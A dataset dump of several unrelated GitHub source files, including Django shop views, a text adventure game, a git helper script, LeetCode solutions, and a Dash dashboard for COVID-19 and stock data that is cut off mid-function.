list(zip(st[1::3], st[2::3]))\r\n tups = sorted(tups, key=lambda x: x[1], reverse=True)\r\n # print(tups)\r\n\r\n prof = 0\r\n jobs = 0\r\n emp = [1] * n\r\n for tup in tups:\r\n f = tup[0] - 1\r\n try:\r\n emp[f]\r\n except:\r\n f = n - 1\r\n while f != -1:\r\n if emp[f] == 1:\r\n prof += tup[1]\r\n jobs += 1\r\n emp[f] = 0\r\n break\r\n else:\r\n f -= 1\r\n print(str(jobs) + ' ' + str(prof))\r\n\r\n\r\nfor i in range(t):\r\n code()\r\n\r\n\r\n","repo_name":"ByKyle/practice","sub_path":"src/main/java/cn/yk/practice/alg/3183.py","file_name":"3183.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71028058792","text":"from django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.shortcuts import render, redirect, reverse\nfrom django.views import View\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.views.generic import DeleteView, CreateView\n\nfrom .models import Product, Type, Cart, User, Wishlist\nfrom .settings.base import INFO\n\n# Create your views here.\n\n\nclass IndexView(View):\n\n def get(self, request):\n\n context = {'products': Product.objects.all()[:8]}\n context.update(INFO)\n return render(request, 'shop/index.html', context)\n\n\nclass ShopView(View):\n def get(self, request, prod_type=None):\n page = self.request.GET.get('page')\n\n if not prod_type:\n products_list = Product.objects.all()\n else:\n products_list = Product.objects.filter(type__type=prod_type)\n type_list = Type.objects.all()\n\n product_on_page = 4\n paginator = Paginator(products_list, product_on_page)\n\n try:\n products_list = paginator.page(page)\n products_list.page_tuple = tuple(paginator.page_range)\n except PageNotAnInteger:\n products_list = paginator.page(1)\n except EmptyPage:\n return redirect(reverse('shop'))\n\n context = {\n 'page_obj': products_list,\n 'type_list': type_list,\n 'prod_type': prod_type,\n # 'paginator': paginator\n }\n context.update(INFO)\n return render(request, 'shop/shop.html', context)\n\n\nclass AboutView(View):\n\n def get(self, request):\n context = INFO\n return render(request, 'shop/about.html', context)\n\n\nclass ContactView(View):\n\n def get(self, request):\n context = INFO\n return render(request, 'shop/contact.html', context)\n\n\nclass WishlistView(LoginRequiredMixin, View):\n\n def get(self, request):\n context = {\n 'products': Wishlist.objects.filter(user_id__auth_user__username=request.user)\n }\n context.update(INFO)\n return render(request, 'shop/wishlist.html', context)\n\n\nclass WishlistViewDelete(LoginRequiredMixin, DeleteView):\n\n def get(self, request):\n product = request.GET.get('product')\n\n product_to_delete = Wishlist.objects.get(user_id__auth_user__username=request.user, product=product)\n product_to_delete.delete()\n cart_list = Wishlist.objects.filter(user_id__auth_user__username=request.user)\n context = {\n 'cart_list': cart_list,\n }\n context.update(INFO)\n return redirect(request.META.get('HTTP_REFERER', '/'))\n\n\nclass ProductView(View):\n\n def get(self, request):\n product = request.GET.get('product')\n product_to_show = Product.objects.get(name=product)\n\n context = {'products': Product.objects.all()[:4],\n 'product_to_show': product_to_show}\n context.update(INFO)\n return render(request, 'shop/product-single.html', context)\n\n\nclass CartView(LoginRequiredMixin, View):\n\n def get(self, request):\n\n cart_list = Cart.objects.filter(user_id__auth_user__username=request.user)\n\n context = {\n 'cart_list': cart_list,\n }\n context.update(INFO)\n return render(request, 'shop/cart.html', context)\n\n\nclass CartViewDelete(LoginRequiredMixin, DeleteView):\n\n def get(self, request):\n product = request.GET.get('product')\n\n product_to_delete = Cart.objects.get(user_id__auth_user__username=request.user, product=product)\n product_to_delete.delete()\n cart_list = Cart.objects.filter(user_id__auth_user__username=request.user)\n context = {\n 'cart_list': cart_list,\n }\n context.update(INFO)\n return redirect(request.META.get('HTTP_REFERER', '/'))\n\n\nclass ShopAddCartView(LoginRequiredMixin, CreateView):\n\n def get(self, request):\n product = request.GET.get('product')\n current_product = Product.objects.get(name=product)\n if product in [i.product.name for i in Cart.objects.filter(user_id__auth_user__username=request.user)]:\n current_product = Cart.objects.get(user_id__auth_user__username=request.user, product=current_product)\n current_product.count += 1\n current_product.save()\n else:\n current_user = User.objects.get(auth_user=request.user)\n Cart.objects.create(user_id=current_user, product=current_product, count=1)\n return redirect(request.META.get('HTTP_REFERER', '/'))\n\n\nclass ShopAddWishlistView(LoginRequiredMixin, CreateView):\n\n def get(self, request):\n product = request.GET.get('product')\n current_product = Product.objects.get(name=product)\n if product in [i.product.name for i in Wishlist.objects.filter(user_id__auth_user__username=request.user)]:\n current_product = Wishlist.objects.get(user_id__auth_user__username=request.user, product=current_product)\n current_product.count += 1\n current_product.save()\n else:\n current_user = User.objects.get(auth_user=request.user)\n Wishlist.objects.create(user_id=current_user, product=current_product, count=1)\n return redirect(request.META.get('HTTP_REFERER', '/'))\n\n\nclass CheckoutView(View):\n\n def get(self, request):\n context = INFO\n return render(request, 'shop/checkout.html', context)\n\n","repo_name":"chernovk/clean_web_proj","sub_path":"shop/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16447673352","text":"#import classes\nfrom room import Room\nfrom rpginfo import RPGInfo\nfrom item import Item\nfrom character import Friend\nfrom character import Enemy\n#create object haunted mansion\nhaunted_mansion = RPGInfo(\"____The Haunted Mansion____\")\n#call instance method welcome()\nhaunted_mansion.welcome()\nhaunted_mansion.instruction()\n#call static game generator message \nRPGInfo.info()\n#call room to make new rooms\nkitchen = Room(\"Kitchen\")\nballroom = Room(\"Ballroom\")\ndining_hall = Room(\"Dining Hall\")\ndungeon = Room(\"Dungeon\")\n#describe the rooms\nkitchen.set_description(\"A dank and dirty place, buzzing with flies\")\nballroom.set_description(\"A vast room with a shiny wooden floor; huge candlesticks gaurd the door\")\ndining_hall.set_description(\"A large room with ornate golden decorations on each wall\")\ndungeon.set_description(\"A large echoing dark windowless space\")\n#link the rooms\nkitchen.link_room(dining_hall,\"south\")\nballroom.link_room(dining_hall,\"east\")\ndining_hall.link_room(kitchen,\"north\")\ndining_hall.link_room(ballroom,\"west\")\ndining_hall.link_room(dungeon,\"east\")\ndungeon.link_room(dining_hall,\"west\")\n#define some unfriendly characters to fight\ndave = Enemy(\"Dave\",\"A smelly Zombie!\")\ndining_hall.set_character(dave)\ndave.set_conversation(\"Aaaa.....gh, br.......ains\")\ndave.set_weakness(\"spell\")\ndave.set_defeats(0)\n\ndragon = Enemy(\"A fire breathing dragon\", \"Sleeping soundly\")\ndungeon.set_character(dragon)\ndragon.set_conversation(\"Zzzzzzz\")\ndragon.set_weakness(\"sword\")\ndragon.set_defeats(0)\n#define some friendly characters to assist you\nanna = Friend(\"Anna\",\"A freindly ghost who once was a nurse\")\nballroom.set_character(anna)\nanna.set_conversation(\"You look poorly, can I assist?\")\n#define some items and where to find them\nsword = Item(\"sword\")\nsword.set_description(\"A rusty, blunt old cutlass\")\nsword.set_colour(\"sky blue purple\") \nkitchen.set_item(sword)\n\nspell = Item(\"spell\")\nspell.set_description(\"An old well thumbed book of spells\")\nspell.set_colour(\"Silver\") \ndining_hall.set_item(spell)\n\ncandelstick = Item(\"candlestick\")\ncandelstick.set_description(\"It has three candles in it\")\ncandelstick.set_colour(\"Golden\") \nballroom.set_item(candelstick)\n\ngold = Item(\"gold\")\ngold.set_description(\"A dragons hoard of golden coins\")\ngold.set_colour(\"deepest gold\")\ndungeon.set_item(gold)\n\n#set variables for player's health, location, wins and backpack contents\nhealth = 5\nwins = 0\ncurrent_room = kitchen\nbackpack = [ ]\n#set flag to allow exit from main program loop\nflag = True\n\n#main program loop\nwhile flag == True:\n #keep an eye on your health\n print(\"\\n\")\n print(\"your health is \",health)\n current_room.get_details()\n inhabitant = current_room.get_character()\n item = current_room.get_item()\n wins = dave.get_defeats() + dragon.get_defeats()\n #check if you have won\n if wins >1:\n print(\"You have defeated \",wins,\" opponents.\")\n print(\"**** Congratulations You Win the game ****\\n\\n\")\n break\n #check who and what is in room\n if inhabitant is not None:\n inhabitant.describe()\n if item is not None:\n item.describe()\n #get player input\n command=input(\">\")\n if command in [\"north\",\"south\",\"east\",\"west\"]:\n current_room = current_room.move(command)\n elif command == \"talk\":\n inhabitant.talk()\n elif command == \"fight\":\n health = health - 2\n print(\"What will you fight with?\")\n weapon = input()\n #check weapon in backpack\n if weapon in backpack:\n flag = inhabitant.fight(weapon)\n if weapon not in backpack:\n print(\"Ooops that's not in your backpack\\n\" + inhabitant.name + \" attacks you\")\n health = 0\n if health <= 0:\n print(\"Your health has now fallen too low so.....\")\n break\n #replenish health\n elif command==\"heal\":\n health=inhabitant.healing(health)\n #pick up object and place in backpack\n elif command==\"take\":\n backpack.append(item.get_name())\n print(\"your backpack contains \", backpack )\n current_room.set_item(None)\n \n#check if exited main loop because won if not you lost\nif wins < 2:\n print(\"You died.........\\n***********************\\n\" ) \n#print credits \nRPGInfo.author = \"Raspberry Pi Foundation\"\nRPGInfo.credits()\n","repo_name":"jons1s/haunted_mansion","sub_path":"Haunted_Mansion.py","file_name":"Haunted_Mansion.py","file_ext":"py","file_size_in_byte":4299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73976409192","text":"from subprocess import check_output, CalledProcessError\n\n\ndef handleGitCommit(m):\n try:\n check_output(\"git add .\", shell=True)\n s = check_output(f\"git commit -m \\\"{m}\\\"\", shell=True).decode()\n return f\"[green]Successfully Committed:[/green] {s}\"\n except CalledProcessError as e:\n return f\"[red]Error: {e.output.decode()}[/]\"\n\n\ndef handleGitPull():\n try:\n s = check_output(\"git pull origin main\", shell=True).decode()\n return f\"[green]Pulled From Remote Repo:[/green] {s}\"\n except CalledProcessError as e:\n return f\"[red]Error: {e.output.decode()}[/]\"\n\n\ndef handleGitPush():\n try:\n s = check_output(\"git push origin main\", shell=True).decode()\n return f\"[green]Pushed To Remote Repo,[/green] {s}\"\n except CalledProcessError as e:\n return f\"[red]Error: {e.output.decode()}[/]\"\n","repo_name":"dev-SR/thesis-v1","sub_path":"utils/git.py","file_name":"git.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"31616018451","text":"from django.urls import path\nfrom .views import *\n\nurlpatterns = [\n # path('', rooms, name='rooms'),\n path('/', index, name='index'),\n path('login/', Login, name='login'),\n path('logout/', Logout, name='logout'),\n path('signup/', Signup, name='signup'),\n path('profile/', Profile_Details, name='profile'),\n path('create-room/', create_rooms, name='create-room'),\n path('room/', roomDetails, name='room'),\n path('update-room/', updateRoom, name='update-room'),\n path('rooms/', roomss, name='roomss')\n]","repo_name":"NoV-ds/Conferencing","sub_path":"WEBRTC/webrtc/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28410439506","text":"class Solution(object):\n def combinationSum2(self, candidates, target):\n solution = []\n self.dfs(solution, [], 0, sorted(candidates), target)\n return solution\n\n def dfs(self, res, temp, start, candidates, target):\n if target < 0:\n return\n elif target == 0:\n res.append(temp[:])\n for i in range(start, len(candidates)):\n if i > start and candidates[i] == candidates[i - 1]:\n continue\n temp.append(candidates[i])\n self.dfs(res, temp, i + 1, candidates, target - candidates[i])\n temp.pop()\n\n'''\nSuccess\nDetails \nRuntime: 96 ms, faster than 37.34% of Python online submissions for Combination Sum II.\nMemory Usage: 10.9 MB, less than 17.84% of Python online submissions for Combination Sum II.\n172 / 172 test cases passed.\nStatus: Accepted\nRuntime: 96 ms\nMemory Usage: 10.9 MB\n\nNext challenges:\nThird Maximum Number\nFind All Numbers Disappeared in an Array\nMaximum Width Ramp\n\nRelated topics: Array, Backtracking\nSimilar Questions: Combination Sum\n'''\n","repo_name":"KunyiLiu/algorithm_problems","sub_path":"kangli/leetcode/backtracking/combination_sum_ii.py","file_name":"combination_sum_ii.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74420517034","text":"from sqlalchemy import create_engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\n\nSQLALCHEMY_DATABASE_URI = 'postgresql://postgres:admin@172.18.0.2/social_media'\nengine = create_engine(SQLALCHEMY_DATABASE_URI, pool_size=20, max_overflow=0)\nSessionLocal = sessionmaker(bind=engine)\nBase = declarative_base()\n\nfrom database.models import *\n\n\n# Генератор подключений\ndef get_db():\n db = SessionLocal()\n try:\n yield db\n except Exception:\n db.rollback()\n raise\n finally:\n db.close()\n\n","repo_name":"javlking/fastapi_social_media","sub_path":"database/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26216150201","text":"# https://leetcode.com/problems/sort-integers-by-the-number-of-1-bits/\nclass Solution:\n def sortByBits(self, arr: List[int]) -> List[int]:\n def countOne(x):\n cnt = 0\n while x != 0:\n x = (x & x - 1)\n cnt += 1\n return cnt\n\n ap = list(map(lambda x: (countOne(x), x), arr))\n # tuples sort by each key, one after another\n ap.sort()\n res = list(map(lambda x: x[1], ap))\n return res\n","repo_name":"zhuli19901106/leetcode-zhuli","sub_path":"algorithms/1001-1500/1356_sort-integers-by-the-number-of-1-bits_1_AC.py","file_name":"1356_sort-integers-by-the-number-of-1-bits_1_AC.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":557,"dataset":"github-code","pt":"72"} +{"seq_id":"43978529363","text":"from typing import List, Dict\n\nimport logging\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_table\nimport pandas as pd\nimport numpy as np\nimport plotly.graph_objs as go\n# from dash.dependencies import Input, Output\nimport dash_bootstrap_components as dbc\nimport pandas as pd\nfrom dash.dependencies import ClientsideFunction, Input, Output, State\n\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.metrics import r2_score\nfrom statsmodels.tsa.arima_model import ARIMA\nfrom sklearn.metrics import mean_squared_error\n\nfrom model import get_doubling_time_ts_df, corona_country_data, corona_table_data\nfrom view import (\n layout_parent,\n app_layout,\n line_graph,\n GRAY,\n GRAY_TRANSP,\n get_color,\n title_mapping,\n)\nfrom view.utils import registered_popovers\n\nexternal_scripts = ['/assets/style.css']\n\nlogger = logging.getLogger(__name__)\nlogging.basicConfig()\nlogger.setLevel(logging.INFO)\n# this is the application/server\napp = dash.Dash(\n __name__,\n meta_tags=[{\"name\": \"viewport\", \"content\": \"width=device-width\"}],\n external_stylesheets=[dbc.themes.LUX], \n # external_scripts=external_scripts\n)\nserver = app.server\napp.layout = app_layout\napp.title = 'Covid-19 and Stock Market Analysis'\n\n\n# dfrel = pd.read_csv(\"stock_reliance.csv\")\n# df = pd.read_csv(\"stock_data.csv\")\ndf = pd.read_csv(\"stock_for_covid.csv\")\ndf2 = pd.read_csv(\"dataset_Facebook.csv\",\";\")\n\ndf_ml = df2.copy()\n\nlb_make = LabelEncoder()\ndf_ml[\"Type\"] = lb_make.fit_transform(df_ml[\"Type\"])\ndf_ml = df_ml.fillna(0)\n\nX = df_ml.drop(['like'], axis = 1).values\nY = df_ml['like'].values\n\nX = StandardScaler().fit_transform(X)\n\nX_Train, X_Test, Y_Train, Y_Test = train_test_split(X, Y, test_size = 0.30, random_state = 101)\n\nrandomforest = RandomForestRegressor(n_estimators=500,min_samples_split=10)\nrandomforest.fit(X_Train,Y_Train)\n\np_train = randomforest.predict(X_Train)\np_test = randomforest.predict(X_Test)\n\ntrain_acc = r2_score(Y_Train, p_train)\ntest_acc = r2_score(Y_Test, p_test)\n\n# app.layout = html.Div([html.H1(\"Stock Market Impacted due to Lockdowm\", style={\"textAlign\": \"center\"}), dcc.Markdown('''\n# Welcome to my Plotly (Dash) Data Science interactive dashboard. In order to create this dashboard have been used two different datasets. The first one is the [Huge Stock Market Dataset by Boris Marjanovic](https://www.kaggle.com/borismarjanovic/price-volume-data-for-all-us-stocks-etfs)\n# and the second one is the [Facebook metrics Data Set by Moro, S., Rita, P., & Vala, B](https://archive.ics.uci.edu/ml/datasets/Facebook+metrics). This dashboard is divided in 3 main tabs. In the first one you can choose whith which other companies to compare Facebook Stock Prices to anaylise main trends.\n# Using the second tab, you can analyse the distributions each of the Facebook Metrics Data Set features. Particular interest is on how paying to advertise posts can boost posts visibility. Finally, in the third tab a Machine Learning analysis of the considered datasets is proposed. \n# All the data displayed in this dashboard is fetched, processed and updated using Python (eg. ML models are trained in real time!).\n# ''') ,\n# dcc.Tabs(id=\"tabs\", children=[\n# dcc.Tab(label='Stock Prices', children=[\n# html.Div([html.H1(\"Dataset Introduction\", style={'textAlign': 'center'}),\n# dash_table.DataTable(\n# id='table',\n# columns=[{\"name\": i, \"id\": i} for i in df.columns],\n# data=df.iloc[0:5,:].to_dict(\"rows\"),\n# ),\n# html.H1(\"Facebook Stocks High vs Lows\", style={'textAlign': 'center', 'padding-top': 5}),\n# dcc.Dropdown(id='my-dropdown',options=[{'label': 'S&P 500', 'value': 'SNP'},{'label': 'Nifty Fifty', 'value': 'NFT'},{'label': 'Facebook', 'value': 'FB'},{'label': 'Microsoft', 'value': 'MCR'},{'label': 'Crude Oil', 'value': 'CRUD'},{'label': 'Reliance', 'value': 'REL'}],\n# multi=True,value=['FB'],style={\"display\": \"block\", \"margin-left\": \"auto\", \"margin-right\": \"auto\", \"width\": \"80%\"}),\n# dcc.Graph(id='highlow'), dash_table.DataTable(\n# id='table2',\n# columns=[{\"name\": i, \"id\": i} for i in df.describe().reset_index().columns],\n# data= df.describe().reset_index().to_dict(\"rows\"),\n# ),\n# html.H1(\"Facebook Market Volume\", style={'textAlign': 'center', 'padding-top': 5}),\n# dcc.Dropdown(id='my-dropdown2',options=[{'label': 'S&P 500', 'value': 'SNP'},{'label': 'Nifty Fifty', 'value': 'NFT'},{'label': 'Facebook', 'value': 'FB'},{'label': 'Microsoft', 'value': 'MCR'},{'label': 'Crude Oil', 'value': 'CRUD'},{'label': 'Reliance', 'value': 'REL'}],\n# multi=True,value=['FB'],style={\"display\": \"block\", \"margin-left\": \"auto\", \"margin-right\": \"auto\", \"width\": \"80%\"}),\n# dcc.Graph(id='volume'),\n# html.H1(\"Scatter Analysis\", style={'textAlign': 'center', 'padding-top': -10}),\n# dcc.Dropdown(id='my-dropdown3',\n# options=[{'label': 'S&P 500', 'value': 'SNP'},{'label': 'Nifty Fifty', 'value': 'NFT'},{'label': 'Facebook', 'value': 'FB'},{'label': 'Microsoft', 'value': 'MCR'},{'label': 'Crude Oil', 'value': 'CRUD'},{'label': 'Reliance', 'value': 'REL'}],\n# value= 'FB',\n# style={\"display\": \"block\", \"margin-left\": \"auto\", \"margin-right\": \"auto\", \"width\": \"45%\"}),\n# dcc.Dropdown(id='my-dropdown4',\n# options=[{'label': 'S&P 500', 'value': 'SNP'},{'label': 'Nifty Fifty', 'value': 'NFT'},{'label': 'Facebook', 'value': 'FB'},{'label': 'Microsoft', 'value': 'MCR'},{'label': 'Crude Oil', 'value': 'CRUD'},{'label': 'Reliance', 'value': 'REL'}],\n# value= 'MCR',\n# style={\"display\": \"block\", \"margin-left\": \"auto\", \"margin-right\": \"auto\", \"width\": \"45%\"}),\n# dcc.RadioItems(id=\"radiob\", value= \"High\", labelStyle={'display': 'inline-block', 'padding': 10},\n# options=[{'label': \"High\", 'value': \"High\"}, {'label': \"Low\", 'value': \"Low\"} , {'label': \"Volume\", 'value': \"Volume\"}],\n# style={'textAlign': \"center\", }),\n# dcc.Graph(id='scatter')\n# ], className=\"container\"),\n# ])\n\n# @app.callback(Output('world_map', 'figure'))\n# def get_ world_map(selected_dropdown):\n# fig=go.Figure(data=go.Choropleth(\n# locations = df['CODE'],\n# z = df['Total Cases'],\n# text = df['Country'],\n# colorscale = 'Mint',\n# autocolorscale=False,\n# # reversescale=True,\n# # marker_line_color='darkgray',\n# marker_line_width=0.5,\n# # colorbar_tickprefix = '$',\n# colorbar_title = 'Total Cases',\n# ))\n\n# fig.update_layout(\n# title_text='Coronavirus on World Map',\n# geo=dict(\n# showframe=False,\n# showcoastlines=False,\n# projection_type='equirectangular'\n# ),\n# annotations = [dict(\n# x=0.55,\n# y=0.1,\n# xref='paper',\n# yref='paper',\n# showarrow = False\n# )]\n# )\n# return fig\n\n@app.callback(Output('highlow', 'figure'),\n [Input('my-dropdown', 'value')])\ndef update_graph(selected_dropdown):\n dropdown = {\"SNP\": \"S&P 500\",\"NFT\": \"Nifty Fifty\",\"FB\": \"Facebook\",\"MCR\": \"Microsoft\",\"CRUD\": \"Crude Oil\",\"REL\": \"Reliance\",}\n # {'label': 'S&P 500', 'value': 'SNP'},{'label': 'Nifty Fifty', 'value': 'NFT'},{'label': 'Facebook', 'value': 'FB'},{'label': 'Microsoft', 'value': 'MCR'},{'label': 'Crude Oil', 'value': 'CRUD'},{'label': 'Reliance', 'value': 'REL'}\n trace1 = []\n trace2 = []\n for stock in selected_dropdown:\n trace1.append(go.Scatter(x=df[df[\"Stock\"] == stock][\"Date\"],y=df[df[\"Stock\"] == stock][\"High\"],mode='lines',\n opacity=0.7,name=f'High {dropdown[stock]}',textposition='bottom center'))\n trace2.append(go.Scatter(x=df[df[\"Stock\"] == stock][\"Date\"],y=df[df[\"Stock\"] == stock][\"Low\"],mode='lines',\n opacity=0.6,name=f'Low {dropdown[stock]}',textposition='bottom center'))\n traces = [trace1, trace2]\n data = [val for sublist in traces for val in sublist]\n figure = {'data': data,\n 'layout': go.Layout(colorway=[\"#5E0DAC\", '#FF4F00', '#375CB1', '#FF7400', '#FFF400', '#FF0056'],\n height=600,title=f\"High and Low Prices for {', '.join(str(dropdown[i]) for i in selected_dropdown)} Over Time\",\n xaxis={\"title\":\"Date\",\n 'rangeselector': {'buttons': list([{'count': 1, 'label': '1M', 'step': 'month', 'stepmode': 'backward'},\n {'count': 6, 'label': '6M', 'step': 'month', 'stepmode': 'backward'},\n {'step': 'all'}])},\n 'rangeslider': {'visible': True}, 'type': 'date'},yaxis={\"title\":\"Price (USD)\"}, paper_bgcolor='rgba(0,0,0,0)',\n plot_bgcolor='rgba(0,0,0,0)')}\n return figure\n\n@app.callback(Output('volume', 'figure'),\n [Input('my-dropdown2', 'value')])\ndef update_graph(selected_dropdown_value):\n dropdown = {\"SNP\": \"S&P 500\",\"NFT\": \"Nifty Fifty\",\"FB\": \"Facebook\",\"MCR\": \"Microsoft\",\"CRUD\": \"Crude Oil\",\"REL\": \"Reliance\",}\n trace1 = []\n for stock in selected_dropdown_value:\n trace1.append(go.Scatter(x=df[df[\"Stock\"] == stock][\"Date\"],y=df[df[\"Stock\"] == stock][\"Volume\"],mode='lines',\n opacity=0.7,name=f'Volume {dropdown[stock]}',textposition='bottom center'))\n traces = [trace1]\n data = [val for sublist in traces for val in sublist]\n figure = {'data': data,\n 'layout': go.Layout(colorway=[\"#5E0DAC\", '#FF4F00', '#375CB1', '#FF7400', '#FFF400', '#FF0056'],\n height=600,title=f\"Market Volume for {', '.join(str(dropdown[i]) for i in selected_dropdown_value)} Over Time\",\n xaxis={\"title\":\"Date\",\n 'rangeselector': {'buttons': list([{'count': 1, 'label': '1M', 'step': 'month', 'stepmode': 'backward'},\n {'count': 6, 'label': '6M', 'step': 'month', 'stepmode': 'backward'},\n {'step': 'all'}])},\n 'rangeslider': {'visible': True}, 'type': 'date'},yaxis={\"title\":\"Transactions Volume\"} , paper_bgcolor='rgba(0,0,0,0)',\n plot_bgcolor='rgba(0,0,0,0)')}\n return figure\n\n@app.callback(Output('scatter', 'figure'),\n [Input('my-dropdown3', 'value'), Input('my-dropdown4', 'value'), Input(\"radiob\", \"value\"),])\ndef update_graph(stock, stock2, radioval):\n dropdown = {\"SNP\": \"S&P 500\",\"NFT\": \"Nifty Fifty\",\"FB\": \"Facebook\",\"MCR\": \"Microsoft\",\"CRUD\": \"Crude Oil\",\"REL\": \"Reliance\",}\n radio = {\"High\": \"High Prices\", \"Low\": \"Low Prices\", \"Volume\": \"Market Volume\", }\n trace1 = []\n if (stock == None) or (stock2 == None):\n trace1.append(\n go.Scatter(x= [0], y= [0],\n mode='markers', opacity=0.7, textposition='bottom center'))\n traces = [trace1]\n data = [val for sublist in traces for val in sublist]\n figure = {'data': data,\n 'layout': go.Layout(colorway=['#FF7400', '#FFF400', '#FF0056'],\n height=600, title=f\"{radio[radioval]}\",\n paper_bgcolor='rgba(0,0,0,0)',\n plot_bgcolor='rgba(0,0,0,0)')}\n else:\n trace1.append(go.Scatter(x=df[df[\"Stock\"] == stock][radioval][-1000:], y=df[df[\"Stock\"] == stock2][radioval][-1000:],\n mode='markers', opacity=0.7, textposition='bottom center'))\n traces = [trace1]\n data = [val for sublist in traces for val in sublist]\n figure = {'data': data,\n 'layout': go.Layout(colorway=['#FF7400', '#FFF400', '#FF0056'],\n height=600,title=f\"{radio[radioval]} of {dropdown[stock]} vs {dropdown[stock2]} Over Time (1000 iterations)\",\n xaxis={\"title\": stock,}, yaxis={\"title\": stock2}, paper_bgcolor='rgba(0,0,0,0)',\n plot_bgcolor='rgba(0,0,0,0)')}\n return figure\n\n# Create callback for resizing the charts\n# app.clientside_callback(\n# ClientsideFunction(namespace=\"clientside\", function_name=\"resize\"),\n# Output(\"output-clientside\", \"children\"),\n# [Input(\"count_graph\", \"figure\")],\n# )\n\n\n@app.callback(\n Output(\"count_graph\", \"figure\"),\n [\n Input(\"countries\", \"value\"),\n Input(\"data_source\", \"value\"),\n Input(\"line_graph_view\", \"value\"),\n Input(\"line_graph_scaler\", \"value\"),\n Input(\"date_slider\", \"value\"),\n Input(\"count_graph\", \"hoverData\"),\n ],\n)\ndef update_time_series(\n countries: List[str],\n data_source: str,\n line_graph_view: str,\n line_graph_scaler: str,\n date_slider: int,\n hover_data: dict,\n) -> Dict[str, List]:\n\n if line_graph_view == \"trajectory\":\n return update_trajectory_chart(\n countries, data_source, line_graph_scaler, date_slider, hover_data,\n )\n\n # special filtering for viewing \"from n days setting\"\n if line_graph_view in [\"since_100\", \"since_10\"]:\n df = get_doubling_time_ts_df(countries, line_graph_view, data_source)\n countries += list(filter(lambda x: \"double\" in x, df.index))\n x_vals = df.columns\n else:\n df = corona_country_data[data_source][line_graph_view].copy()\n x_vals = [x[:-3] for x in df.columns]\n\n # popualte the data output field\n data = []\n for country in countries:\n if country in df.index:\n data.append(\n dict(\n type=\"scatter\",\n mode=\"lines\",\n name=country,\n showlegend=True if \"double\" not in country else False,\n y=df.loc[country],\n x=x_vals,\n line=dict(shape=\"spline\", smoothing=\"2\", color=get_color(country),),\n )\n )\n\n title = f\"{title_mapping[data_source]} - {title_mapping[line_graph_view]}\"\n layout_count = {\n **layout_parent,\n \"title\": title,\n \"xaxis\": {\n \"title\": \"Development Time (days)\",\n \"showspikes\": True,\n \"spikethickness\": 1,\n },\n \"yaxis\": {\n \"title\": f\"Count - {title_mapping[line_graph_scaler]}\",\n \"type\": line_graph_scaler,\n \"showspikes\": True,\n \"spikethickness\": 1,\n },\n \"margin\": {\"l\": 70, \"b\": 70, \"r\": 10, \"t\": 50},\n }\n\n return dict(data=data, layout=layout_count)\n\n\ndef update_trajectory_chart(\n countries: List[str],\n data_source: str,\n line_graph_scaler: str,\n date_slider: int,\n hover_data,\n) -> Dict[str, List]:\n\n country_on_hover = None\n if hover_data:\n # divide by two because we are graphing two traces at at time (line and scatter)\n idx = hover_data[\"points\"][0][\"curveNumber\"] // 2\n country_on_hover = countries[idx]\n\n # ts data to operate on\n df_cumulative = corona_country_data[data_source][\"cumulative\"]\n df_daily = corona_country_data[data_source][\"daily_increase\"]\n date = pd.to_datetime(df_cumulative.columns[date_slider])\n\n # popualte the time series data output field.\n # if the date and minimum number of cases is exceeded, then plot the scatter and line trace.\n data = []\n for country in countries:\n if country in df_cumulative.index:\n x = df_cumulative.loc[country]\n y = df_daily.loc[country]\n index = (pd.to_datetime(x.index) <= date) & (x > 50)\n trace_color = (\n get_color(country) if country == country_on_hover else GRAY_TRANSP\n )\n if True in list(index):\n data.append(\n dict(\n type=\"scatter\",\n mode=\"lines\",\n name=country,\n y=y[index],\n x=x[index],\n customdata=country,\n line=dict(shape=\"spline\", smoothing=\"2\", color=trace_color),\n showlegend=False,\n )\n )\n data.append(\n dict(\n type=\"scatter\",\n y=[y[index].iloc[-1]],\n x=[x[index].iloc[-1]],\n text=country,\n name=country,\n mode=\"markers+text\",\n textposition=\"top center\",\n showlegend=False,\n marker={\"size\": 8, \"color\": get_color(country),},\n ),\n )\n\n title = f\"Trajectory of Covid {title_mapping[data_source]} {df_cumulative.columns[date_slider - 1]}\"\n layout_count = {\n **layout_parent,\n \"autosize\": False,\n \"title\": title,\n \"xaxis\": {\n \"title\": \"Total Count\",\n \"type\": line_graph_scaler,\n \"showspikes\": True,\n \"spikethickness\": 1,\n },\n \"yaxis\": {\n \"title\": \"Daily Increase\",\n \"type\": line_graph_scaler,\n \"showspikes\": True,\n \"spikethickness\": 1,\n },\n \"margin\": {\"l\": 70, \"b\": 70, \"r\": 10, \"t\": 50},\n }\n\n return dict(data=data, layout=layout_count)\n\n\n@app.callback(\n Output(\"scatter_plot\", \"figure\"),\n [\n Input(\"countries\", \"value\"),\n Input(\"scatter_x_data\", \"value\"),\n Input(\"scatter_y_data\", \"value\"),\n Input(\"scatter_x_scaler\", \"value\"),\n Input(\"scatter_y_scaler\", \"value\"),\n Input(\"min_cases_thresh\", \"value\"),\n Input(\"show_labels\", \"value\"),\n ],\n)\ndef update_scatter_plot(\n countries: 